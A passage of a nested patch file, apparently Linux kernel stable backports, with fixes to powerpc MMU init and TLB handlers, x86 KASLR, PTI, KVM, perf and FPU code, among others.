++		/* use a quarter of the TLBCAM for bolted linear map */
++		num_cams = (mfspr(SPRN_TLB1CFG) & TLBnCFG_N_ENTRY) / 4;
++
++		/*
++		 * Only do the mapping once per core, or else the
++		 * transient mapping would cause problems.
++		 */
++#ifdef CONFIG_SMP
++		if (hweight32(get_tensr()) > 1)
++			map = false;
++#endif
++
++		if (map)
++			linear_map_top = map_mem_in_cams(linear_map_top,
++							 num_cams, false, true);
++	}
++#endif
++
++	/* A sync won't hurt us after mucking around with
++	 * the MMU configuration
++	 */
++	mb();
++}
++
++static void __init early_init_mmu_global(void)
++{
++	/* XXX This should be decided at runtime based on supported
++	 * page sizes in the TLB, but for now let's assume 16M is
++	 * always there and a good fit (which it probably is)
++	 *
++	 * Freescale booke only supports 4K pages in TLB0, so use that.
++	 */
++	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E))
++		mmu_vmemmap_psize = MMU_PAGE_4K;
++	else
++		mmu_vmemmap_psize = MMU_PAGE_16M;
++
++	/* XXX This code only checks for TLB 0 capabilities and doesn't
++	 *     check what page size combos are supported by the HW. It
++	 *     also doesn't handle the case where a separate array holds
++	 *     the IND entries from the array loaded by the PT.
++	 */
++	/* Look for supported page sizes */
++	setup_page_sizes();
++
++	/* Look for HW tablewalk support */
++	setup_mmu_htw();
++
++#ifdef CONFIG_PPC_E500
++	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
++		if (book3e_htw_mode == PPC_HTW_NONE) {
++			extlb_level_exc = EX_TLB_SIZE;
++			patch_exception(0x1c0, exc_data_tlb_miss_bolted_book3e);
++			patch_exception(0x1e0,
++				exc_instruction_tlb_miss_bolted_book3e);
++		}
++	}
++#endif
++
++	/* Set the global containing the top of the linear mapping
++	 * for use by the TLB miss code
++	 */
++	linear_map_top = memblock_end_of_DRAM();
++
++	ioremap_bot = IOREMAP_BASE;
++}
++
++static void __init early_mmu_set_memory_limit(void)
++{
++#ifdef CONFIG_PPC_E500
++	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
++		/*
++		 * Limit memory so we dont have linear faults.
++		 * Unlike memblock_set_current_limit, which limits
++		 * memory available during early boot, this permanently
++		 * reduces the memory available to Linux.  We need to
++		 * do this because highmem is not supported on 64-bit.
++		 */
++		memblock_enforce_memory_limit(linear_map_top);
++	}
++#endif
++
++	memblock_set_current_limit(linear_map_top);
++}
++
++/* boot cpu only */
++void __init early_init_mmu(void)
++{
++	early_init_mmu_global();
++	early_init_this_mmu();
++	early_mmu_set_memory_limit();
++}
++
++void early_init_mmu_secondary(void)
++{
++	early_init_this_mmu();
++}
++
++void setup_initial_memory_limit(phys_addr_t first_memblock_base,
++				phys_addr_t first_memblock_size)
++{
++	/* On non-FSL Embedded 64-bit, we adjust the RMA size to match
++	 * the bolted TLB entry. We know for now that only 1G
++	 * entries are supported though that may eventually
++	 * change.
++	 *
++	 * on FSL Embedded 64-bit, usually all RAM is bolted, but with
++	 * unusual memory sizes it's possible for some RAM to not be mapped
++	 * (such RAM is not used at all by Linux, since we don't support
++	 * highmem on 64-bit).  We limit ppc64_rma_size to what would be
++	 * mappable if this memblock is the only one.  Additional memblocks
++	 * can only increase, not decrease, the amount that ends up getting
++	 * mapped.  We still limit max to 1G even if we'll eventually map
++	 * more.  This is due to what the early init code is set up to do.
++	 *
++	 * We crop it to the size of the first MEMBLOCK to
++	 * avoid going over total available memory just in case...
++	 */
++#ifdef CONFIG_PPC_E500
++	if (early_mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
++		unsigned long linear_sz;
++		unsigned int num_cams;
++
++		/* use a quarter of the TLBCAM for bolted linear map */
++		num_cams = (mfspr(SPRN_TLB1CFG) & TLBnCFG_N_ENTRY) / 4;
++
++		linear_sz = map_mem_in_cams(first_memblock_size, num_cams,
++					    true, true);
++
++		ppc64_rma_size = min_t(u64, linear_sz, 0x40000000);
++	} else
++#endif
++		ppc64_rma_size = min_t(u64, first_memblock_size, 0x40000000);
++
++	/* Finally limit subsequent allocations */
++	memblock_set_current_limit(first_memblock_base + ppc64_rma_size);
++}
+diff --git a/arch/powerpc/mm/nohash/tlb_low_64e.S b/arch/powerpc/mm/nohash/tlb_low_64e.S
+index 76cf456d79762..d831a111eaba6 100644
+--- a/arch/powerpc/mm/nohash/tlb_low_64e.S
++++ b/arch/powerpc/mm/nohash/tlb_low_64e.S
+@@ -893,201 +893,6 @@ virt_page_table_tlb_miss_whacko_fault:
+ 	TLB_MISS_EPILOG_ERROR
+ 	b	exc_data_storage_book3e
+ 
+-
+-/**************************************************************
+- *                                                            *
+- * TLB miss handling for Book3E with hw page table support    *
+- *                                                            *
+- **************************************************************/
+-
+-
+-/* Data TLB miss */
+-	START_EXCEPTION(data_tlb_miss_htw)
+-	TLB_MISS_PROLOG
+-
+-	/* Now we handle the fault proper. We only save DEAR in normal
+-	 * fault case since that's the only interesting values here.
+-	 * We could probably also optimize by not saving SRR0/1 in the
+-	 * linear mapping case but I'll leave that for later
+-	 */
+-	mfspr	r14,SPRN_ESR
+-	mfspr	r16,SPRN_DEAR		/* get faulting address */
+-	srdi	r11,r16,44		/* get region */
+-	xoris	r11,r11,0xc
+-	cmpldi	cr0,r11,0		/* linear mapping ? */
+-	beq	tlb_load_linear		/* yes -> go to linear map load */
+-	cmpldi	cr1,r11,1		/* vmalloc mapping ? */
+-
+-	/* We do the user/kernel test for the PID here along with the RW test
+-	 */
+-	srdi.	r11,r16,60		/* Check for user region */
+-	ld	r15,PACAPGD(r13)	/* Load user pgdir */
+-	beq	htw_tlb_miss
+-
+-	/* XXX replace the RMW cycles with immediate loads + writes */
+-1:	mfspr	r10,SPRN_MAS1
+-	rlwinm	r10,r10,0,16,1		/* Clear TID */
+-	mtspr	SPRN_MAS1,r10
+-	ld	r15,PACA_KERNELPGD(r13)	/* Load kernel pgdir */
+-	beq+	cr1,htw_tlb_miss
+-
+-	/* We got a crappy address, just fault with whatever DEAR and ESR
+-	 * are here
+-	 */
+-	TLB_MISS_EPILOG_ERROR
+-	b	exc_data_storage_book3e
+-
+-/* Instruction TLB miss */
+-	START_EXCEPTION(instruction_tlb_miss_htw)
+-	TLB_MISS_PROLOG
+-
+-	/* If we take a recursive fault, the second level handler may need
+-	 * to know whether we are handling a data or instruction fault in
+-	 * order to get to the right store fault handler. We provide that
+-	 * info by keeping a crazy value for ESR in r14
+-	 */
+-	li	r14,-1	/* store to exception frame is done later */
+-
+-	/* Now we handle the fault proper. We only save DEAR in the non
+-	 * linear mapping case since we know the linear mapping case will
+-	 * not re-enter. We could indeed optimize and also not save SRR0/1
+-	 * in the linear mapping case but I'll leave that for later
+-	 *
+-	 * Faulting address is SRR0 which is already in r16
+-	 */
+-	srdi	r11,r16,44		/* get region */
+-	xoris	r11,r11,0xc
+-	cmpldi	cr0,r11,0		/* linear mapping ? */
+-	beq	tlb_load_linear		/* yes -> go to linear map load */
+-	cmpldi	cr1,r11,1		/* vmalloc mapping ? */
+-
+-	/* We do the user/kernel test for the PID here along with the RW test
+-	 */
+-	srdi.	r11,r16,60		/* Check for user region */
+-	ld	r15,PACAPGD(r13)		/* Load user pgdir */
+-	beq	htw_tlb_miss
+-
+-	/* XXX replace the RMW cycles with immediate loads + writes */
+-1:	mfspr	r10,SPRN_MAS1
+-	rlwinm	r10,r10,0,16,1			/* Clear TID */
+-	mtspr	SPRN_MAS1,r10
+-	ld	r15,PACA_KERNELPGD(r13)		/* Load kernel pgdir */
+-	beq+	htw_tlb_miss
+-
+-	/* We got a crappy address, just fault */
+-	TLB_MISS_EPILOG_ERROR
+-	b	exc_instruction_storage_book3e
+-
+-
+-/*
+- * This is the guts of the second-level TLB miss handler for direct
+- * misses. We are entered with:
+- *
+- * r16 = virtual page table faulting address
+- * r15 = PGD pointer
+- * r14 = ESR
+- * r13 = PACA
+- * r12 = TLB exception frame in PACA
+- * r11 = crap (free to use)
+- * r10 = crap (free to use)
+- *
+- * It can be re-entered by the linear mapping miss handler. However, to
+- * avoid too much complication, it will save/restore things for us
+- */
+-htw_tlb_miss:
+-#ifdef CONFIG_PPC_KUAP
+-	mfspr	r10,SPRN_MAS1
+-	rlwinm.	r10,r10,0,0x3fff0000
+-	beq-	htw_tlb_miss_fault /* KUAP fault */
+-#endif
+-	/* Search if we already have a TLB entry for that virtual address, and
+-	 * if we do, bail out.
+-	 *
+-	 * MAS1:IND should be already set based on MAS4
+-	 */
+-	PPC_TLBSRX_DOT(0,R16)
+-	beq	htw_tlb_miss_done
+-
+-	/* Now, we need to walk the page tables. First check if we are in
+-	 * range.
+-	 */
+-	rldicl.	r10,r16,64-PGTABLE_EADDR_SIZE,PGTABLE_EADDR_SIZE+4
+-	bne-	htw_tlb_miss_fault
+-
+-	/* Get the PGD pointer */
+-	cmpldi	cr0,r15,0
+-	beq-	htw_tlb_miss_fault
+-
+-	/* Get to PGD entry */
+-	rldicl	r11,r16,64-(PGDIR_SHIFT-3),64-PGD_INDEX_SIZE-3
+-	clrrdi	r10,r11,3
+-	ldx	r15,r10,r15
+-	cmpdi	cr0,r15,0
+-	bge	htw_tlb_miss_fault
+-
+-	/* Get to PUD entry */
+-	rldicl	r11,r16,64-(PUD_SHIFT-3),64-PUD_INDEX_SIZE-3
+-	clrrdi	r10,r11,3
+-	ldx	r15,r10,r15
+-	cmpdi	cr0,r15,0
+-	bge	htw_tlb_miss_fault
+-
+-	/* Get to PMD entry */
+-	rldicl	r11,r16,64-(PMD_SHIFT-3),64-PMD_INDEX_SIZE-3
+-	clrrdi	r10,r11,3
+-	ldx	r15,r10,r15
+-	cmpdi	cr0,r15,0
+-	bge	htw_tlb_miss_fault
+-
+-	/* Ok, we're all right, we can now create an indirect entry for
+-	 * a 1M or 256M page.
+-	 *
+-	 * The last trick is now that because we use "half" pages for
+-	 * the HTW (1M IND is 2K and 256M IND is 32K) we need to account
+-	 * for an added LSB bit to the RPN. For 64K pages, there is no
+-	 * problem as we already use 32K arrays (half PTE pages), but for
+-	 * 4K page we need to extract a bit from the virtual address and
+-	 * insert it into the "PA52" bit of the RPN.
+-	 */
+-	rlwimi	r15,r16,32-9,20,20
+-	/* Now we build the MAS:
+-	 *
+-	 * MAS 0   :	Fully setup with defaults in MAS4 and TLBnCFG
+-	 * MAS 1   :	Almost fully setup
+-	 *               - PID already updated by caller if necessary
+-	 *               - TSIZE for now is base ind page size always
+-	 * MAS 2   :	Use defaults
+-	 * MAS 3+7 :	Needs to be done
+-	 */
+-	ori	r10,r15,(BOOK3E_PAGESZ_4K << MAS3_SPSIZE_SHIFT)
+-
+-	srdi	r16,r10,32
+-	mtspr	SPRN_MAS3,r10
+-	mtspr	SPRN_MAS7,r16
+-
+-	tlbwe
+-
+-htw_tlb_miss_done:
+-	/* We don't bother with restoring DEAR or ESR since we know we are
+-	 * level 0 and just going back to userland. They are only needed
+-	 * if you are going to take an access fault
+-	 */
+-	TLB_MISS_EPILOG_SUCCESS
+-	rfi
+-
+-htw_tlb_miss_fault:
+-	/* We need to check if it was an instruction miss. We know this
+-	 * though because r14 would contain -1
+-	 */
+-	cmpdi	cr0,r14,-1
+-	beq	1f
+-	mtspr	SPRN_DEAR,r16
+-	mtspr	SPRN_ESR,r14
+-	TLB_MISS_EPILOG_ERROR
+-	b	exc_data_storage_book3e
+-1:	TLB_MISS_EPILOG_ERROR
+-	b	exc_instruction_storage_book3e
+-
+ /*
+  * This is the guts of "any" level TLB miss handler for kernel linear
+  * mapping misses. We are entered with:
+diff --git a/arch/riscv/kernel/head.S b/arch/riscv/kernel/head.S
+index 4bf6c449d78b6..1a017ad53343c 100644
+--- a/arch/riscv/kernel/head.S
++++ b/arch/riscv/kernel/head.S
+@@ -307,6 +307,9 @@ clear_bss_done:
+ #else
+ 	mv a0, s1
+ #endif /* CONFIG_BUILTIN_DTB */
++	/* Set trap vector to spin forever to help debug */
++	la a3, .Lsecondary_park
++	csrw CSR_TVEC, a3
+ 	call setup_vm
+ #ifdef CONFIG_MMU
+ 	la a0, early_pg_dir
+diff --git a/arch/s390/kernel/vmlinux.lds.S b/arch/s390/kernel/vmlinux.lds.S
+index 729d4f949cfe8..52d6e5d1b4532 100644
+--- a/arch/s390/kernel/vmlinux.lds.S
++++ b/arch/s390/kernel/vmlinux.lds.S
+@@ -71,6 +71,15 @@ SECTIONS
+ 	. = ALIGN(PAGE_SIZE);
+ 	__end_ro_after_init = .;
+ 
++	.data.rel.ro : {
++		*(.data.rel.ro .data.rel.ro.*)
++	}
++	.got : {
++		__got_start = .;
++		*(.got)
++		__got_end = .;
++	}
++
+ 	RW_DATA(0x100, PAGE_SIZE, THREAD_SIZE)
+ 	BOOT_DATA_PRESERVED
+ 
+diff --git a/arch/um/drivers/line.c b/arch/um/drivers/line.c
+index 95ad6b190d1d1..6b4faca401ea1 100644
+--- a/arch/um/drivers/line.c
++++ b/arch/um/drivers/line.c
+@@ -383,6 +383,7 @@ int setup_one_line(struct line *lines, int n, char *init,
+ 			parse_chan_pair(NULL, line, n, opts, error_out);
+ 			err = 0;
+ 		}
++		*error_out = "configured as 'none'";
+ 	} else {
+ 		char *new = kstrdup(init, GFP_KERNEL);
+ 		if (!new) {
+@@ -406,6 +407,7 @@ int setup_one_line(struct line *lines, int n, char *init,
+ 			}
+ 		}
+ 		if (err) {
++			*error_out = "failed to parse channel pair";
+ 			line->init_str = NULL;
+ 			line->valid = 0;
+ 			kfree(new);
+diff --git a/arch/x86/coco/tdx/tdx.c b/arch/x86/coco/tdx/tdx.c
+index 4692450aeb4d3..b9da467bd2228 100644
+--- a/arch/x86/coco/tdx/tdx.c
++++ b/arch/x86/coco/tdx/tdx.c
+@@ -328,7 +328,6 @@ static bool mmio_read(int size, unsigned long addr, unsigned long *val)
+ 		.r12 = size,
+ 		.r13 = EPT_READ,
+ 		.r14 = addr,
+-		.r15 = *val,
+ 	};
+ 
+ 	if (__tdx_hypercall(&args, TDX_HCALL_HAS_OUTPUT))
+diff --git a/arch/x86/events/intel/core.c b/arch/x86/events/intel/core.c
+index 949129443b1c0..27968d10dd0b4 100644
+--- a/arch/x86/events/intel/core.c
++++ b/arch/x86/events/intel/core.c
+@@ -4352,6 +4352,25 @@ static u8 adl_get_hybrid_cpu_type(void)
+ 	return hybrid_big;
+ }
+ 
++static inline bool erratum_hsw11(struct perf_event *event)
++{
++	return (event->hw.config & INTEL_ARCH_EVENT_MASK) ==
++		X86_CONFIG(.event=0xc0, .umask=0x01);
++}
++
++/*
++ * The HSW11 requires a period larger than 100 which is the same as the BDM11.
++ * A minimum period of 128 is enforced as well for the INST_RETIRED.ALL.
++ *
++ * The message 'interrupt took too long' can be observed on any counter which
++ * was armed with a period < 32 and two events expired in the same NMI.
++ * A minimum period of 32 is enforced for the rest of the events.
++ */
++static void hsw_limit_period(struct perf_event *event, s64 *left)
++{
++	*left = max(*left, erratum_hsw11(event) ? 128 : 32);
++}
++
+ /*
+  * Broadwell:
+  *
+@@ -4369,8 +4388,7 @@ static u8 adl_get_hybrid_cpu_type(void)
+  */
+ static void bdw_limit_period(struct perf_event *event, s64 *left)
+ {
+-	if ((event->hw.config & INTEL_ARCH_EVENT_MASK) ==
+-			X86_CONFIG(.event=0xc0, .umask=0x01)) {
++	if (erratum_hsw11(event)) {
+ 		if (*left < 128)
+ 			*left = 128;
+ 		*left &= ~0x3fULL;
+@@ -6180,6 +6198,7 @@ __init int intel_pmu_init(void)
+ 
+ 		x86_pmu.hw_config = hsw_hw_config;
+ 		x86_pmu.get_event_constraints = hsw_get_event_constraints;
++		x86_pmu.limit_period = hsw_limit_period;
+ 		x86_pmu.lbr_double_abort = true;
+ 		extra_attr = boot_cpu_has(X86_FEATURE_RTM) ?
+ 			hsw_format_attr : nhm_format_attr;
+diff --git a/arch/x86/include/asm/fpu/types.h b/arch/x86/include/asm/fpu/types.h
+index eb7cd1139d978..b85af124f8999 100644
+--- a/arch/x86/include/asm/fpu/types.h
++++ b/arch/x86/include/asm/fpu/types.h
+@@ -577,6 +577,13 @@ struct fpu_state_config {
+ 	 * even without XSAVE support, i.e. legacy features FP + SSE
+ 	 */
+ 	u64 legacy_features;
++	/*
++	 * @independent_features:
++	 *
++	 * Features that are supported by XSAVES, but not managed as part of
++	 * the FPU core, such as LBR
++	 */
++	u64 independent_features;
+ };
+ 
+ /* FPU state configuration information */
+diff --git a/arch/x86/include/asm/page_64.h b/arch/x86/include/asm/page_64.h
+index 198e03e59ca19..554af02a05262 100644
+--- a/arch/x86/include/asm/page_64.h
++++ b/arch/x86/include/asm/page_64.h
+@@ -17,6 +17,7 @@ extern unsigned long phys_base;
+ extern unsigned long page_offset_base;
+ extern unsigned long vmalloc_base;
+ extern unsigned long vmemmap_base;
++extern unsigned long physmem_end;
+ 
+ static __always_inline unsigned long __phys_addr_nodebug(unsigned long x)
+ {
+diff --git a/arch/x86/include/asm/pgtable_64_types.h b/arch/x86/include/asm/pgtable_64_types.h
+index 04f36063ad546..6c7f7c526450a 100644
+--- a/arch/x86/include/asm/pgtable_64_types.h
++++ b/arch/x86/include/asm/pgtable_64_types.h
+@@ -139,6 +139,10 @@ extern unsigned int ptrs_per_p4d;
+ # define VMEMMAP_START		__VMEMMAP_BASE_L4
+ #endif /* CONFIG_DYNAMIC_MEMORY_LAYOUT */
+ 
++#ifdef CONFIG_RANDOMIZE_MEMORY
++# define PHYSMEM_END		physmem_end
++#endif
++
+ /*
+  * End of the region for which vmalloc page tables are pre-allocated.
+  * For non-KMSAN builds, this is the same as VMALLOC_END.
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 2aa849705bb68..d185943437453 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -792,6 +792,9 @@ void __init fpu__init_system_xstate(unsigned int legacy_size)
+ 		goto out_disable;
+ 	}
+ 
++	fpu_kernel_cfg.independent_features = fpu_kernel_cfg.max_features &
++					      XFEATURE_MASK_INDEPENDENT;
++
+ 	/*
+ 	 * Clear XSAVE features that are disabled in the normal CPUID.
+ 	 */
+diff --git a/arch/x86/kernel/fpu/xstate.h b/arch/x86/kernel/fpu/xstate.h
+index 19ca623ffa2ac..544224611e23c 100644
+--- a/arch/x86/kernel/fpu/xstate.h
++++ b/arch/x86/kernel/fpu/xstate.h
+@@ -64,9 +64,9 @@ static inline u64 xfeatures_mask_supervisor(void)
+ static inline u64 xfeatures_mask_independent(void)
+ {
+ 	if (!cpu_feature_enabled(X86_FEATURE_ARCH_LBR))
+-		return XFEATURE_MASK_INDEPENDENT & ~XFEATURE_MASK_LBR;
++		return fpu_kernel_cfg.independent_features & ~XFEATURE_MASK_LBR;
+ 
+-	return XFEATURE_MASK_INDEPENDENT;
++	return fpu_kernel_cfg.independent_features;
+ }
+ 
+ /* XSAVE/XRSTOR wrapper functions */
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 4a663812562db..a96facc051391 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -2756,6 +2756,12 @@ static int svm_get_msr(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 	case MSR_CSTAR:
+ 		msr_info->data = svm->vmcb01.ptr->save.cstar;
+ 		break;
++	case MSR_GS_BASE:
++		msr_info->data = svm->vmcb01.ptr->save.gs.base;
++		break;
++	case MSR_FS_BASE:
++		msr_info->data = svm->vmcb01.ptr->save.fs.base;
++		break;
+ 	case MSR_KERNEL_GS_BASE:
+ 		msr_info->data = svm->vmcb01.ptr->save.kernel_gs_base;
+ 		break;
+@@ -2982,6 +2988,12 @@ static int svm_set_msr(struct kvm_vcpu *vcpu, struct msr_data *msr)
+ 	case MSR_CSTAR:
+ 		svm->vmcb01.ptr->save.cstar = data;
+ 		break;
++	case MSR_GS_BASE:
++		svm->vmcb01.ptr->save.gs.base = data;
++		break;
++	case MSR_FS_BASE:
++		svm->vmcb01.ptr->save.fs.base = data;
++		break;
+ 	case MSR_KERNEL_GS_BASE:
+ 		svm->vmcb01.ptr->save.kernel_gs_base = data;
+ 		break;
+@@ -4960,6 +4972,9 @@ static __init void svm_set_cpu_caps(void)
+ 
+ 	/* CPUID 0x8000001F (SME/SEV features) */
+ 	sev_set_cpu_caps();
++
++	/* Don't advertise Bus Lock Detect to guest if SVM support is absent */
++	kvm_cpu_cap_clear(X86_FEATURE_BUS_LOCK_DETECT);
+ }
+ 
+ static __init int svm_hardware_setup(void)
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 658a88483d8b6..4e778ba6a5d47 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -5747,7 +5747,9 @@ long kvm_arch_vcpu_ioctl(struct file *filp,
+ 		if (copy_from_user(&events, argp, sizeof(struct kvm_vcpu_events)))
+ 			break;
+ 
++		kvm_vcpu_srcu_read_lock(vcpu);
+ 		r = kvm_vcpu_ioctl_x86_set_vcpu_events(vcpu, &events);
++		kvm_vcpu_srcu_read_unlock(vcpu);
+ 		break;
+ 	}
+ 	case KVM_GET_DEBUGREGS: {
+diff --git a/arch/x86/lib/iomem.c b/arch/x86/lib/iomem.c
+index e0411a3774d49..5eecb45d05d5d 100644
+--- a/arch/x86/lib/iomem.c
++++ b/arch/x86/lib/iomem.c
+@@ -25,6 +25,9 @@ static __always_inline void rep_movs(void *to, const void *from, size_t n)
+ 
+ static void string_memcpy_fromio(void *to, const volatile void __iomem *from, size_t n)
+ {
++	const void *orig_to = to;
++	const size_t orig_n = n;
++
+ 	if (unlikely(!n))
+ 		return;
+ 
+@@ -39,7 +42,7 @@ static void string_memcpy_fromio(void *to, const volatile void __iomem *from, si
+ 	}
+ 	rep_movs(to, (const void *)from, n);
+ 	/* KMSAN must treat values read from devices as initialized. */
+-	kmsan_unpoison_memory(to, n);
++	kmsan_unpoison_memory(orig_to, orig_n);
+ }
+ 
+ static void string_memcpy_toio(volatile void __iomem *to, const void *from, size_t n)
+diff --git a/arch/x86/mm/init_64.c b/arch/x86/mm/init_64.c
+index 3f040c6e5d13a..6d294d24e488e 100644
+--- a/arch/x86/mm/init_64.c
++++ b/arch/x86/mm/init_64.c
+@@ -950,8 +950,12 @@ static void update_end_of_memory_vars(u64 start, u64 size)
+ int add_pages(int nid, unsigned long start_pfn, unsigned long nr_pages,
+ 	      struct mhp_params *params)
+ {
++	unsigned long end = ((start_pfn + nr_pages) << PAGE_SHIFT) - 1;
+ 	int ret;
+ 
++	if (WARN_ON_ONCE(end > PHYSMEM_END))
++		return -ERANGE;
++
+ 	ret = __add_pages(nid, start_pfn, nr_pages, params);
+ 	WARN_ON_ONCE(ret);
+ 
+diff --git a/arch/x86/mm/kaslr.c b/arch/x86/mm/kaslr.c
+index 37db264866b64..230f1dee4f095 100644
+--- a/arch/x86/mm/kaslr.c
++++ b/arch/x86/mm/kaslr.c
+@@ -47,13 +47,24 @@ static const unsigned long vaddr_end = CPU_ENTRY_AREA_BASE;
+  */
+ static __initdata struct kaslr_memory_region {
+ 	unsigned long *base;
++	unsigned long *end;
+ 	unsigned long size_tb;
+ } kaslr_regions[] = {
+-	{ &page_offset_base, 0 },
+-	{ &vmalloc_base, 0 },
+-	{ &vmemmap_base, 0 },
++	{
++		.base	= &page_offset_base,
++		.end	= &physmem_end,
++	},
++	{
++		.base	= &vmalloc_base,
++	},
++	{
++		.base	= &vmemmap_base,
++	},
+ };
+ 
++/* The end of the possible address space for physical memory */
++unsigned long physmem_end __ro_after_init;
++
+ /* Get size in bytes used by the memory region */
+ static inline unsigned long get_padding(struct kaslr_memory_region *region)
+ {
+@@ -82,6 +93,8 @@ void __init kernel_randomize_memory(void)
+ 	BUILD_BUG_ON(vaddr_end != CPU_ENTRY_AREA_BASE);
+ 	BUILD_BUG_ON(vaddr_end > __START_KERNEL_map);
+ 
++	/* Preset the end of the possible address space for physical memory */
++	physmem_end = ((1ULL << MAX_PHYSMEM_BITS) - 1);
+ 	if (!kaslr_memory_enabled())
+ 		return;
+ 
+@@ -128,11 +141,18 @@ void __init kernel_randomize_memory(void)
+ 		vaddr += entropy;
+ 		*kaslr_regions[i].base = vaddr;
+ 
++		/* Calculate the end of the region */
++		vaddr += get_padding(&kaslr_regions[i]);
+ 		/*
+-		 * Jump the region and add a minimum padding based on
+-		 * randomization alignment.
++		 * KASLR trims the maximum possible size of the
++		 * direct-map. Update the physmem_end boundary.
++		 * No rounding required as the region starts
++		 * PUD aligned and size is in units of TB.
+ 		 */
+-		vaddr += get_padding(&kaslr_regions[i]);
++		if (kaslr_regions[i].end)
++			*kaslr_regions[i].end = __pa_nodebug(vaddr - 1);
++
++		/* Add a minimum padding based on randomization alignment. */
+ 		vaddr = round_up(vaddr + 1, PUD_SIZE);
+ 		remain_entropy -= entropy;
+ 	}
+diff --git a/arch/x86/mm/pti.c b/arch/x86/mm/pti.c
+index 7b804c34c0201..d5f702ea4c781 100644
+--- a/arch/x86/mm/pti.c
++++ b/arch/x86/mm/pti.c
+@@ -241,7 +241,7 @@ static pmd_t *pti_user_pagetable_walk_pmd(unsigned long address)
+  *
+  * Returns a pointer to a PTE on success, or NULL on failure.
+  */
+-static pte_t *pti_user_pagetable_walk_pte(unsigned long address)
++static pte_t *pti_user_pagetable_walk_pte(unsigned long address, bool late_text)
+ {
+ 	gfp_t gfp = (GFP_KERNEL | __GFP_NOTRACK | __GFP_ZERO);
+ 	pmd_t *pmd;
+@@ -251,10 +251,15 @@ static pte_t *pti_user_pagetable_walk_pte(unsigned long address)
+ 	if (!pmd)
+ 		return NULL;
+ 
+-	/* We can't do anything sensible if we hit a large mapping. */
++	/* Large PMD mapping found */
+ 	if (pmd_large(*pmd)) {
+-		WARN_ON(1);
+-		return NULL;
++		/* Clear the PMD if we hit a large mapping from the first round */
++		if (late_text) {
++			set_pmd(pmd, __pmd(0));
++		} else {
++			WARN_ON_ONCE(1);
++			return NULL;
++		}
+ 	}
+ 
+ 	if (pmd_none(*pmd)) {
+@@ -283,7 +288,7 @@ static void __init pti_setup_vsyscall(void)
+ 	if (!pte || WARN_ON(level != PG_LEVEL_4K) || pte_none(*pte))
+ 		return;
+ 
+-	target_pte = pti_user_pagetable_walk_pte(VSYSCALL_ADDR);
++	target_pte = pti_user_pagetable_walk_pte(VSYSCALL_ADDR, false);
+ 	if (WARN_ON(!target_pte))
+ 		return;
+ 
+@@ -301,7 +306,7 @@ enum pti_clone_level {
+ 
+ static void
+ pti_clone_pgtable(unsigned long start, unsigned long end,
+-		  enum pti_clone_level level)
++		  enum pti_clone_level level, bool late_text)
+ {
+ 	unsigned long addr;
+ 
+@@ -390,7 +395,7 @@ pti_clone_pgtable(unsigned long start, unsigned long end,
+ 				return;
+ 
+ 			/* Allocate PTE in the user page-table */
+-			target_pte = pti_user_pagetable_walk_pte(addr);
++			target_pte = pti_user_pagetable_walk_pte(addr, late_text);
+ 			if (WARN_ON(!target_pte))
+ 				return;
+ 
+@@ -452,7 +457,7 @@ static void __init pti_clone_user_shared(void)
+ 		phys_addr_t pa = per_cpu_ptr_to_phys((void *)va);
+ 		pte_t *target_pte;
+ 
+-		target_pte = pti_user_pagetable_walk_pte(va);
++		target_pte = pti_user_pagetable_walk_pte(va, false);
+ 		if (WARN_ON(!target_pte))
+ 			return;
+ 
+@@ -475,7 +480,7 @@ static void __init pti_clone_user_shared(void)
+ 	start = CPU_ENTRY_AREA_BASE;
+ 	end   = start + (PAGE_SIZE * CPU_ENTRY_AREA_PAGES);
+ 
+-	pti_clone_pgtable(start, end, PTI_CLONE_PMD);
++	pti_clone_pgtable(start, end, PTI_CLONE_PMD, false);
+ }
+ #endif /* CONFIG_X86_64 */
+ 
+@@ -492,11 +497,11 @@ static void __init pti_setup_espfix64(void)
+ /*
+  * Clone the populated PMDs of the entry text and force it RO.
+  */
+-static void pti_clone_entry_text(void)
++static void pti_clone_entry_text(bool late)
+ {
+ 	pti_clone_pgtable((unsigned long) __entry_text_start,
+ 			  (unsigned long) __entry_text_end,
+-			  PTI_LEVEL_KERNEL_IMAGE);
++			  PTI_LEVEL_KERNEL_IMAGE, late);
+ }
+ 
+ /*
+@@ -571,7 +576,7 @@ static void pti_clone_kernel_text(void)
+ 	 * pti_set_kernel_image_nonglobal() did to clear the
+ 	 * global bit.
+ 	 */
+-	pti_clone_pgtable(start, end_clone, PTI_LEVEL_KERNEL_IMAGE);
++	pti_clone_pgtable(start, end_clone, PTI_LEVEL_KERNEL_IMAGE, false);
+ 
+ 	/*
+ 	 * pti_clone_pgtable() will set the global bit in any PMDs
+@@ -638,8 +643,15 @@ void __init pti_init(void)
+ 
+ 	/* Undo all global bits from the init pagetables in head_64.S: */
+ 	pti_set_kernel_image_nonglobal();
++
+ 	/* Replace some of the global bits just for shared entry text: */
+-	pti_clone_entry_text();
++	/*
++	 * This is very early in boot. Device and Late initcalls can do
++	 * modprobe before free_initmem() and mark_readonly(). This
++	 * pti_clone_entry_text() allows those user-mode-helpers to function,
++	 * but notably the text is still RW.
++	 */
++	pti_clone_entry_text(false);
+ 	pti_setup_espfix64();
+ 	pti_setup_vsyscall();
+ }
+@@ -656,10 +668,11 @@ void pti_finalize(void)
+ 	if (!boot_cpu_has(X86_FEATURE_PTI))
+ 		return;
+ 	/*
+-	 * We need to clone everything (again) that maps parts of the
+-	 * kernel image.
++	 * This is after free_initmem() (all initcalls are done) and we've done
++	 * mark_readonly(). Text is now NX which might've split some PMDs
++	 * relative to the early clone.
+ 	 */
+-	pti_clone_entry_text();
++	pti_clone_entry_text(true);
+ 	pti_clone_kernel_text();
+ 
+ 	debug_checkwx_user();
+diff --git a/drivers/acpi/acpi_processor.c b/drivers/acpi/acpi_processor.c
